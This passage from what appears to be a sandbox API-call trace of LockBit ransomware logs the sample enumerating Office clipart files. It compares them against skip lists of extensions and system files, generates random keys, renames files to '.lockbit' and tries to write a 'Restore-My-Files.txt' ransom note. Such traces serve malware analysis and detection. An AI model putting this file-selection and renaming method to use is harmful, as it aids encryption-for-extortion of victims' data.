lpString2="DD00121_.WMF") returned 1 [0110.039] lstrcmpiW (lpString1="ntldr", lpString2="DD00121_.WMF") returned 1 [0110.039] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD00121_.WMF") returned 1 [0110.039] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD00121_.WMF") returned -1 [0110.039] lstrcmpiW (lpString1="autorun.inf", lpString2="DD00121_.WMF") returned -1 [0110.039] lstrcmpiW (lpString1="thumbs.db", lpString2="DD00121_.WMF") returned 1 [0110.039] lstrcmpiW (lpString1="iconcache.db", lpString2="DD00121_.WMF") returned 1 [0110.039] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0110.039] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned=".WMF" [0110.039] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0110.039] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0110.039] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0110.039] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0110.039] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0110.039] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0110.039] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0110.039] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0110.040] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0110.040] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0110.040] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0110.040] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0110.040] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0110.040] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0110.040] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0110.040] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0110.040] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0110.040] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0110.040] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0110.040] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0110.040] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0110.040] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0110.040] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0110.040] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0110.040] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0110.040] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0110.040] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0110.040] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0110.040] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF.lockbit") returned 72 [0110.040] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00121_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0110.042] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0110.042] malloc (_Size=0x40068) returned 0x1ff1e60 [0110.042] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=8256) returned 1 [0110.042] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.043] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.043] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0110.043] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.044] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0110.044] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.049] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0110.049] malloc (_Size=0xa6) returned 0x77d800 [0110.049] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0110.051] free (_Block=0x77d800) [0110.051] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0110.051] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0110.051] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0110.052] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x73bc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD00234_.WMF", cAlternateFileName="")) returned 1 [0110.052] lstrcmpiW (lpString1=".", lpString2="DD00234_.WMF") returned -1 [0110.052] lstrcmpiW (lpString1="..", lpString2="DD00234_.WMF") returned -1 [0110.052] PathFindExtensionW (pszPath="DD00234_.WMF") returned=".WMF" [0110.052] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0110.052] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0110.052] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0110.052] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0110.052] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0110.052] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0110.052] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0110.052] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0110.052] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0110.052] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0110.052] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0110.052] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0110.052] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0110.052] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0110.053] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0110.053] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0110.053] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0110.053] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0110.053] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0110.053] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0110.053] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0110.053] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0110.053] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0110.053] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0110.053] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.053] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0110.053] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0110.053] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0110.053] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0110.053] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0110.053] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0110.053] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0110.053] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0110.053] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0110.053] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0110.053] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0110.053] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0110.053] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0110.053] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0110.054] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0110.054] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0110.054] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0110.054] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.054] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0110.054] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0110.054] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0110.054] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0110.054] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD00234_.WMF") returned 1 [0110.054] lstrcmpiW (lpString1="ntldr", lpString2="DD00234_.WMF") returned 1 [0110.054] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD00234_.WMF") returned 1 [0110.054] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD00234_.WMF") returned -1 [0110.054] lstrcmpiW (lpString1="autorun.inf", lpString2="DD00234_.WMF") returned -1 [0110.054] lstrcmpiW (lpString1="thumbs.db", lpString2="DD00234_.WMF") returned 1 [0110.054] lstrcmpiW (lpString1="iconcache.db", lpString2="DD00234_.WMF") returned 1 [0110.054] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0110.054] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned=".WMF" [0110.054] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0110.054] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0110.054] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0110.054] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0110.054] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0110.054] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0110.054] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0110.054] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0110.055] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0110.055] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0110.055] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0110.055] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0110.055] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0110.055] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0110.055] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0110.055] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0110.055] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0110.055] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0110.055] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0110.055] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0110.055] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0110.055] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0110.055] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0110.055] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0110.055] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0110.055] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0110.055] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0110.055] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0110.055] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF.lockbit") returned 72 [0110.055] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00234_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0110.056] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0110.056] malloc (_Size=0x40068) returned 0x1ff1e60 [0110.056] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=29628) returned 1 [0110.056] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.057] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.057] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0110.057] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.058] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.058] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0110.058] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.064] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0110.064] malloc (_Size=0xa6) returned 0x77d800 [0110.064] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0110.070] free (_Block=0x77d800) [0110.070] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0110.070] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0110.070] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0110.070] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf650000, ftCreationTime.dwHighDateTime=0x1bd4b31, ftLastAccessTime.dwLowDateTime=0x51d5b650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf650000, ftLastWriteTime.dwHighDateTime=0x1bd4b31, nFileSizeHigh=0x0, nFileSizeLow=0xa82, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD00255_.WMF", cAlternateFileName="")) returned 1 [0110.070] lstrcmpiW (lpString1=".", lpString2="DD00255_.WMF") returned -1 [0110.070] lstrcmpiW (lpString1="..", lpString2="DD00255_.WMF") returned -1 [0110.070] PathFindExtensionW (pszPath="DD00255_.WMF") returned=".WMF" [0110.070] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0110.071] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0110.071] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0110.071] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0110.071] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0110.071] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0110.071] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0110.071] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0110.071] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0110.071] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0110.071] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0110.071] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0110.071] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0110.071] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0110.071] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0110.071] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0110.071] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0110.071] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0110.071] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0110.071] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0110.071] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0110.071] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0110.074] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0110.074] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0110.074] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.074] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0110.074] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0110.074] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0110.074] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0110.074] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0110.074] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0110.074] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0110.074] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0110.074] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0110.074] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0110.074] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0110.074] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0110.074] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0110.074] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0110.074] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0110.074] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0110.074] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0110.074] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.074] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0110.074] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0110.075] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0110.075] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0110.075] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD00255_.WMF") returned 1 [0110.075] lstrcmpiW (lpString1="ntldr", lpString2="DD00255_.WMF") returned 1 [0110.075] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD00255_.WMF") returned 1 [0110.075] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD00255_.WMF") returned -1 [0110.075] lstrcmpiW (lpString1="autorun.inf", lpString2="DD00255_.WMF") returned -1 [0110.075] lstrcmpiW (lpString1="thumbs.db", lpString2="DD00255_.WMF") returned 1 [0110.075] lstrcmpiW (lpString1="iconcache.db", lpString2="DD00255_.WMF") returned 1 [0110.075] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0110.075] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned=".WMF" [0110.075] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0110.075] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0110.075] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0110.075] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0110.075] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0110.075] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0110.075] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0110.075] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0110.075] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0110.075] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0110.075] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0110.075] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0110.075] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0110.075] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0110.076] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0110.076] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0110.076] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0110.076] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0110.076] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0110.076] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0110.076] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0110.076] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0110.076] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0110.076] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0110.076] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0110.076] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0110.076] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0110.076] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0110.076] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF.lockbit") returned 72 [0110.076] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00255_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0110.078] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0110.078] malloc (_Size=0x40068) returned 0x1ff1e60 [0110.078] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2690) returned 1 [0110.078] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.079] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.079] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0110.079] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.079] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.079] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0110.079] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0110.088] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0110.088] malloc (_Size=0xa6) returned 0x77d800 [0110.088] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0110.088] free (_Block=0x77d800) [0110.088] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0110.088] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0110.089] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0110.089] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, 